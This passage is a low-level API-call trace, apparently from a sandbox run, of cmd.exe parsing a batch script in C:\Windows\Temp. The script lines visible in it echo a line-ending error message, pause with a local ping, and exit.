_String2="findstr") returned 12 [0175.303] _wcsicmp (_String1="REM/?", _String2="findstr") returned 12 [0175.304] GetProcessHeap () returned 0x19a8f1e0000 [0175.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0175.304] GetProcessHeap () returned 0x19a8f1e0000 [0175.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb980 [0175.304] GetProcessHeap () returned 0x19a8f1e0000 [0175.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f8fa0 [0175.304] GetProcessHeap () returned 0x19a8f1e0000 [0175.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0175.304] GetProcessHeap () returned 0x19a8f1e0000 [0175.304] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0175.304] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.304] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa0b [0175.304] ReadFile (in: hFile=0x10, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efece0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efece0*=0x1fff, lpOverlapped=0x0) returned 1 [0175.304] SetFilePointer (in: hFile=0x10, lDistanceToMove=2578, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa12 [0175.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\nndstr /v \"$\" \"%~nx0\" && (\r\n\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 7 [0175.304] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.304] GetFileType (hFile=0x10) returned 0x1 [0175.304] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.305] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa12 [0175.305] GetProcessHeap () returned 0x19a8f1e0000 [0175.305] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.305] GetProcessHeap () returned 0x19a8f1e0000 [0175.305] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.306] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0175.306] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0175.306] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0175.306] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0175.306] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0175.306] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0175.306] GetProcessHeap () returned 0x19a8f1e0000 [0175.306] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0175.306] GetProcessHeap () returned 0x19a8f1e0000 [0175.306] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6b0 [0175.306] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.306] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa12 [0175.306] ReadFile (in: hFile=0x10, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efec80, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efec80*=0x1fff, lpOverlapped=0x0) returned 1 [0175.306] SetFilePointer (in: hFile=0x10, lDistanceToMove=2684, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7c [0175.306] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Error: Script either has LF line ending issue or an empty line at the end of the script is missing.\r\n", cbMultiByte=106, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo Error: Script either has LF line ending issue or an empty line at the end of the script is missing.\r\n================================\r\n") returned 106 [0175.306] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.306] GetFileType (hFile=0x10) returned 0x1 [0175.306] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.307] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa7c [0175.307] GetProcessHeap () returned 0x19a8f1e0000 [0175.307] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.307] GetProcessHeap () returned 0x19a8f1e0000 [0175.307] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.307] GetProcessHeap () returned 0x19a8f1e0000 [0175.308] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0175.308] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0175.308] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0175.308] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0175.308] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0175.308] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0175.308] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0175.308] GetProcessHeap () returned 0x19a8f1e0000 [0175.308] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0175.308] GetProcessHeap () returned 0x19a8f1e0000 [0175.309] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb860 [0175.309] GetProcessHeap () returned 0x19a8f1e0000 [0175.309] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xda) returned 0x19a8f1eaed0 [0175.309] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.309] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa7c [0175.310] ReadFile (in: hFile=0x10, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efec50, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efec50*=0x1fff, lpOverlapped=0x0) returned 1 [0175.310] SetFilePointer (in: hFile=0x10, lDistanceToMove=2691, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa83 [0175.310] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\nror: Script either has LF line ending issue or an empty line at the end of the script is missing.\r\n================================\r\n") returned 7 [0175.310] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.310] GetFileType (hFile=0x10) returned 0x1 [0175.310] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.311] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa83 [0175.311] GetProcessHeap () returned 0x19a8f1e0000 [0175.311] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.311] GetProcessHeap () returned 0x19a8f1e0000 [0175.312] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.312] GetProcessHeap () returned 0x19a8f1e0000 [0175.312] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0175.312] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0175.312] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0175.312] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0175.312] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0175.312] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0175.312] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0175.312] GetProcessHeap () returned 0x19a8f1e0000 [0175.313] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0175.313] GetProcessHeap () returned 0x19a8f1e0000 [0175.313] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb9e0 [0175.314] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.314] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa83 [0175.314] ReadFile (in: hFile=0x10, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efec20, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efec20*=0x1fff, lpOverlapped=0x0) returned 1 [0175.315] SetFilePointer (in: hFile=0x10, lDistanceToMove=2717, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa9d [0175.315] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="ping 127.0.0.1 -n 6 >nul\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="ping 127.0.0.1 -n 6 >nul\r\nhas LF line ending issue or an empty line at the end of the script is missing.\r\n================================\r\n") returned 26 [0175.315] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.315] GetFileType (hFile=0x10) returned 0x1 [0175.315] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.315] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa9d [0175.315] GetProcessHeap () returned 0x19a8f1e0000 [0175.315] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.316] GetProcessHeap () returned 0x19a8f1e0000 [0175.317] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.317] GetProcessHeap () returned 0x19a8f1e0000 [0175.317] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0175.317] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0175.317] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0175.317] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0175.317] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0175.317] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0175.317] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0175.317] GetProcessHeap () returned 0x19a8f1e0000 [0175.317] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0175.317] GetProcessHeap () returned 0x19a8f1e0000 [0175.317] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6e0 [0175.317] GetProcessHeap () returned 0x19a8f1e0000 [0175.317] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e09f0 [0175.318] GetProcessHeap () returned 0x19a8f1e0000 [0175.318] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0b70 [0175.318] GetProcessHeap () returned 0x19a8f1e0000 [0175.318] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc80 [0175.318] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.318] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa9d [0175.318] ReadFile (in: hFile=0x10, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebf0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebf0*=0x1fff, lpOverlapped=0x0) returned 1 [0175.318] SetFilePointer (in: hFile=0x10, lDistanceToMove=2723, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaa3 [0175.318] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="popd\r\n", cbMultiByte=6, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="popd\r\n27.0.0.1 -n 6 >nul\r\nhas LF line ending issue or an empty line at the end of the script is missing.\r\n================================\r\n") returned 6 [0175.318] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.318] GetFileType (hFile=0x10) returned 0x1 [0175.318] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.318] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaa3 [0175.318] GetProcessHeap () returned 0x19a8f1e0000 [0175.318] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.318] GetProcessHeap () returned 0x19a8f1e0000 [0175.320] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.320] GetProcessHeap () returned 0x19a8f1e0000 [0175.320] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0175.320] _wcsicmp (_String1="FOR", _String2="popd") returned -10 [0175.320] _wcsicmp (_String1="FOR/?", _String2="popd") returned -10 [0175.320] _wcsicmp (_String1="IF", _String2="popd") returned -7 [0175.320] _wcsicmp (_String1="IF/?", _String2="popd") returned -7 [0175.320] _wcsicmp (_String1="REM", _String2="popd") returned 2 [0175.320] _wcsicmp (_String1="REM/?", _String2="popd") returned 2 [0175.320] GetProcessHeap () returned 0x19a8f1e0000 [0175.320] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0175.320] GetProcessHeap () returned 0x19a8f1e0000 [0175.320] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb710 [0175.320] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.321] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaa3 [0175.321] ReadFile (in: hFile=0x10, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebc0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebc0*=0x1fff, lpOverlapped=0x0) returned 1 [0175.321] SetFilePointer (in: hFile=0x10, lDistanceToMove=2732, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaac [0175.321] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="exit /b\r\n0.0.1 -n 6 >nul\r\nhas LF line ending issue or an empty line at the end of the script is missing.\r\n================================\r\n") returned 9 [0175.321] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.321] GetFileType (hFile=0x10) returned 0x1 [0175.321] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.321] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaac [0175.321] GetProcessHeap () returned 0x19a8f1e0000 [0175.321] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.321] GetProcessHeap () returned 0x19a8f1e0000 [0175.322] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.322] GetProcessHeap () returned 0x19a8f1e0000 [0175.322] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0175.322] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0175.322] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0175.322] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0175.322] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0175.322] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0175.322] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0175.322] GetProcessHeap () returned 0x19a8f1e0000 [0175.322] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0175.322] GetProcessHeap () returned 0x19a8f1e0000 [0175.322] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb740 [0175.322] GetProcessHeap () returned 0x19a8f1e0000 [0175.322] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec800 [0175.323] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.323] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaac [0175.323] ReadFile (in: hFile=0x10, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb90, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb90*=0x1fff, lpOverlapped=0x0) returned 1 [0175.323] SetFilePointer (in: hFile=0x10, lDistanceToMove=2735, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaaf [0175.323] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\nt /b\r\n0.0.1 -n 6 >nul\r\nhas LF line ending issue or an empty line at the end of the script is missing.\r\n================================\r\n") returned 3 [0175.323] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.323] GetFileType (hFile=0x10) returned 0x1 [0175.323] _get_osfhandle (_FileHandle=3) returned 0x10 [0175.323] SetFilePointer (in: hFile=0x10, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaaf [0175.323] GetProcessHeap () returned 0x19a8f1e0000 [0175.323] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.323] GetProcessHeap () returned 0x19a8f1e0000 [0175.324] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.324] _tell (_FileHandle=3) returned 2735 [0175.324] _close (_FileHandle=3) returned 0 [0175.324] GetProcessHeap () returned 0x19a8f1e0000 [0175.324] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0175.324] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.324] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.324] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.325] GetFileType (hFile=0x24) returned 0x2 [0175.325] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0175.325] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efeb68 | out: lpMode=0x43f9efeb68) returned 1 [0175.326] _dup (_FileHandle=1) returned 3 [0175.327] _close (_FileHandle=1) returned 0 [0175.327] _wcsicmp (_String1="nul", _String2="con") returned 11 [0175.327] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x43f9efeb00, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0175.327] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0175.327] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efeb90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.328] _wcsicmp (_String1="findstr", _String2="DIR") returned 2 [0175.328] _wcsicmp (_String1="findstr", _String2="ERASE") returned 1 [0175.328] _wcsicmp (_String1="findstr", _String2="DEL") returned 2 [0175.328] _wcsicmp (_String1="findstr", _String2="TYPE") returned -14 [0175.328] _wcsicmp (_String1="findstr", _String2="COPY") returned 3 [0175.328] _wcsicmp (_String1="findstr", _String2="CD") returned 3 [0175.328] _wcsicmp (_String1="findstr", _String2="CHDIR") returned 3 [0175.328] _wcsicmp (_String1="findstr", _String2="RENAME") returned -12 [0175.328] _wcsicmp (_String1="findstr", _String2="REN") returned -12 [0175.328] _wcsicmp (_String1="findstr", _String2="ECHO") returned 1 [0175.328] _wcsicmp (_String1="findstr", _String2="SET") returned -13 [0175.328] _wcsicmp (_String1="findstr", _String2="PAUSE") returned -10 [0175.328] _wcsicmp (_String1="findstr", _String2="DATE") returned 2 [0175.328] _wcsicmp (_String1="findstr", _String2="TIME") returned -14 [0175.328] _wcsicmp (_String1="findstr", _String2="PROMPT") returned -10 [0175.328] _wcsicmp (_String1="findstr", _String2="MD") returned -7 [0175.328] _wcsicmp (_String1="findstr", _String2="MKDIR") returned -7 [0175.328] _wcsicmp (_String1="findstr", _String2="RD") returned -12 [0175.328] _wcsicmp (_String1="findstr", _String2="RMDIR") returned -12 [0175.328] _wcsicmp (_String1="findstr", _String2="PATH") returned -10 [0175.328] _wcsicmp (_String1="findstr", _String2="GOTO") returned -1 [0175.328] _wcsicmp (_String1="findstr", _String2="SHIFT") returned -13 [0175.348] _wcsicmp (_String1="findstr", _String2="CLS") returned 3 [0175.348] _wcsicmp (_String1="findstr", _String2="CALL") returned 3 [0175.348] _wcsicmp (_String1="findstr", _String2="VERIFY") returned -16 [0175.348] _wcsicmp (_String1="findstr", _String2="VER") returned -16 [0175.349] _wcsicmp (_String1="findstr", _String2="VOL") returned -16 [0175.349] _wcsicmp (_String1="findstr", _String2="EXIT") returned 1 [0175.349] _wcsicmp (_String1="findstr", _String2="SETLOCAL") returned -13 [0175.349] _wcsicmp (_String1="findstr", _String2="ENDLOCAL") returned 1 [0175.349] _wcsicmp (_String1="findstr", _String2="TITLE") returned -14 [0175.349] _wcsicmp (_String1="findstr", _String2="START") returned -13 [0175.349] _wcsicmp (_String1="findstr", _String2="DPATH") returned 2 [0175.349] _wcsicmp (_String1="findstr", _String2="KEYS") returned -5 [0175.349] _wcsicmp (_String1="findstr", _String2="MOVE") returned -7 [0175.349] _wcsicmp (_String1="findstr", _String2="PUSHD") returned -10 [0175.349] _wcsicmp (_String1="findstr", _String2="POPD") returned -10 [0175.349] _wcsicmp (_String1="findstr", _String2="ASSOC") returned 5 [0175.349] _wcsicmp (_String1="findstr", _String2="FTYPE") returned -11 [0175.349] _wcsicmp (_String1="findstr", _String2="BREAK") returned 4 [0175.349] _wcsicmp (_String1="findstr", _String2="COLOR") returned 3 [0175.349] _wcsicmp (_String1="findstr", _String2="MKLINK") returned -7 [0175.349] _wcsicmp (_String1="findstr", _String2="DIR") returned 2 [0175.349] _wcsicmp (_String1="findstr", _String2="ERASE") returned 1 [0175.350] _wcsicmp (_String1="findstr", _String2="DEL") returned 2 [0175.350] _wcsicmp (_String1="findstr", _String2="TYPE") returned -14 [0175.350] _wcsicmp (_String1="findstr", _String2="COPY") returned 3 [0175.350] _wcsicmp (_String1="findstr", _String2="CD") returned 3 [0175.350] _wcsicmp (_String1="findstr", _String2="CHDIR") returned 3 [0175.350] _wcsicmp (_String1="findstr", _String2="RENAME") returned -12 [0175.350] _wcsicmp (_String1="findstr", _String2="REN") returned -12 [0175.350] _wcsicmp (_String1="findstr", _String2="ECHO") returned 1 [0175.350] _wcsicmp (_String1="findstr", _String2="SET") returned -13 [0175.350] _wcsicmp (_String1="findstr", _String2="PAUSE") returned -10 [0175.350] _wcsicmp (_String1="findstr", _String2="DATE") returned 2 [0175.350] _wcsicmp (_String1="findstr", _String2="TIME") returned -14 [0175.350] _wcsicmp (_String1="findstr", _String2="PROMPT") returned -10 [0175.350] _wcsicmp (_String1="findstr", _String2="MD") returned -7 [0175.350] _wcsicmp (_String1="findstr", _String2="MKDIR") returned -7 [0175.350] _wcsicmp (_String1="findstr", _String2="RD") returned -12 [0175.350] _wcsicmp (_String1="findstr", _String2="RMDIR") returned -12 [0175.350] _wcsicmp (_String1="findstr", _String2="PATH") returned -10 [0175.350] _wcsicmp (_String1="findstr", _String2="GOTO") returned -1 [0175.350] _wcsicmp (_String1="findstr", _String2="SHIFT") returned -13 [0175.350] _wcsicmp (_String1="findstr", _String2="CLS") returned 3 [0175.351] _wcsicmp (_String1="findstr", _String2="CALL") returned 3 [0175.351] _wcsicmp (_String1="findstr", _String2="VERIFY") returned -16 [0175.351] _wcsicmp (_String1="findstr", _String2="VER") returned -16 [0175.351] _wcsicmp (_String1="findstr", _String2="VOL") returned -16 [0175.351] _wcsicmp (_String1="findstr", _String2="EXIT") returned 1 [0175.351] _wcsicmp (_String1="findstr", _String2="SETLOCAL") returned -13 [0175.351] _wcsicmp (_String1="findstr", _String2="ENDLOCAL") returned 1 [0175.351] _wcsicmp (_String1="findstr", _String2="TITLE") returned -14 [0175.351] _wcsicmp (_String1="findstr", _String2="START") returned -13 [0175.351] _wcsicmp (_String1="findstr", _String2="DPATH") returned 2 [0175.351] _wcsicmp (_String1="findstr", _String2="KEYS") returned -5 [0175.351] _wcsicmp (_String1="findstr", _String2="MOVE") returned -7 [0175.351] _wcsicmp (_String1="findstr", _String2="PUSHD") returned -10 [0175.351] _wcsicmp (_String1="findstr", _String2="POPD") returned -10 [0175.351] _wcsicmp (_String1="findstr", _String2="ASSOC") returned 5 [0175.351] _wcsicmp (_String1="findstr", _String2="FTYPE") returned -11 [0175.351] _wcsicmp (_String1="findstr", _String2="BREAK") returned 4 [0175.351] _wcsicmp (_String1="findstr", _String2="COLOR") returned 3 [0175.351] _wcsicmp (_String1="findstr", _String2="MKLINK") returned -7 [0175.351] _wcsicmp (_String1="findstr", _String2="FOR") returned -6 [0175.351] _wcsicmp (_String1="findstr", _String2="IF") returned -3 [0175.351] _wcsicmp (_String1="findstr", _String2="REM") returned -12 [0175.352] GetProcessHeap () returned 0x19a8f1e0000 [0175.352] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f1e1e70 [0175.352] GetProcessHeap () returned 0x19a8f1e0000 [0175.352] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x58) returned 0x19a8f1f8760 [0175.352] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0175.352] GetProcessHeap () returned 0x19a8f1e0000 [0175.352] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1ea4b0 [0175.352] SetErrorMode (uMode=0x0) returned 0x0 [0175.352] SetErrorMode (uMode=0x1) returned 0x0 [0175.352] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1ea4c0, lpFilePart=0x43f9efe430 | out: lpBuffer="C:\\Windows\\Temp", lpFilePart=0x43f9efe430*="Temp") returned 0xf [0175.352] SetErrorMode (uMode=0x0) returned 0x1 [0175.352] GetProcessHeap () returned 0x19a8f1e0000 [0175.352] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea4b0, Size=0x40) returned 0x19a8f1ea4b0 [0175.352] GetProcessHeap () returned 0x19a8f1e0000 [0175.352] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea4b0) 